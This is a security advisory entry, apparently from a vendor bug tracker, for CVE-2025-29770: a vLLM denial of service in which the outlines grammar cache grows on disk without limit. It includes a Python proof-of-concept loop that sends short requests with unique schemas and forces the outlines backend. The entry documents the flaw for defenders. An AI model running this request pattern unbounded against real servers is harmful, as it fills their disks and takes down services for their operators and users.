Bug 2353368 (CVE-2025-29770) - vllm: vLLM denial of service via outlines unbounded cache on disk
Summary: CVE-2025-29770 vllm: vLLM denial of service via outlines unbounded cache on disk
Keywords:
Status: NEW
Alias: CVE-2025-29770
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Priority: medium
Severity: medium
Target Milestone: ---
Assignee: Product Security DevOps Team
QA Contact:
URL:
Whiteboard:
Depends On:
Blocks:
 
Reported: 2025-03-19 16:01 UTC by OSIDB Bzimport
Modified: 2025-03-19 18:22 UTC
CC List: 1 user

Fixed In Version:
Clone Of:
Environment:
Last Closed:
Embargoed:



Description OSIDB Bzimport 2025-03-19 16:01:28 UTC
vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. The outlines library is one of the backends used by vLLM to support structured output (a.k.a. guided decoding). Outlines provides an optional cache for its compiled grammars on the local filesystem. This cache is enabled by default in vLLM, and outlines is available by default through the OpenAI-compatible API server.

The affected code in vLLM is vllm/model_executor/guided_decoding/outlines_logits_processors.py, which unconditionally uses the cache from outlines. A malicious user can send a stream of very short decoding requests, each with a unique schema, so that every request adds a new entry to the cache. This can result in a denial of service when the filesystem runs out of space.

Note that even if vLLM is configured to use a different backend by default, it is still possible to select outlines on a per-request basis using the guided_decoding_backend key of the extra_body field of the request. This issue applies only to the V0 engine and is fixed in vLLM 0.8.0.
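To make the per-request attack surface concrete, here is a minimal sketch of the request pattern described above, written with the openai Python client. It assumes a vLLM OpenAI-compatible server at http://localhost:8000/v1; the URL, API key, and model name are placeholders, and the loop is deliberately capped at a few iterations for illustration. The vulnerability stems from this pattern being repeatable without bound.

from openai import OpenAI

# Placeholder endpoint and credentials; a vLLM OpenAI-compatible
# server is assumed to be listening here.
client = OpenAI(base_url="http://localhost:8000/v1", api_key="EMPTY")

for i in range(3):  # an attacker would loop without bound
    # Each iteration supplies a structurally unique JSON schema, so the
    # compiled grammar can never be a cache hit; pre-0.8.0, the V0
    # engine wrote a new outlines cache entry to disk for every schema.
    unique_schema = {
        "type": "object",
        "properties": {f"field_{i}": {"type": "string"}},
        "required": [f"field_{i}"],
    }
    client.chat.completions.create(
        model="placeholder-model",
        messages=[{"role": "user", "content": "hi"}],
        max_tokens=1,  # very short requests keep each probe cheap
        extra_body={
            # Steer this request to outlines even if the server's
            # default guided-decoding backend is something else.
            "guided_decoding_backend": "outlines",
            "guided_json": unique_schema,
        },
    )

Each unique schema yields a distinct cache key, so the on-disk cache grows with every such request until the filesystem fills.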

